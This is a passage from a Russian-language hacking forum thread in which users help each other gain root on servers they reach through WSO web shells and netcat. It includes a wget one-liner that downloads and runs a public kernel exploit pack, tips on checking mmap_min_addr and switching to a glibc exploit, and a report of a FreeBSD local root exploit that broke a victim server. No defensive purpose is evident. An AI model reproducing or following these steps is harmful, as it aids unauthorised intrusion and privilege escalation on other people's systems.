Сообщение от
Expl0ited
Expl0ited said:
rootxcl
:
Код:
Code:
1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!
Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.
rootxcl
Скинь результат выполнения команды
cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))
Сообщение от
Sidarovich1975
Sidarovich1975 said:
Есть проблема!
сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010
Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29
Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________ ________________________________
/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry
__________________________________________________ ________________________________
и не выкидывает.....
в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)
как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...
Ты делал все с
двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?
Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.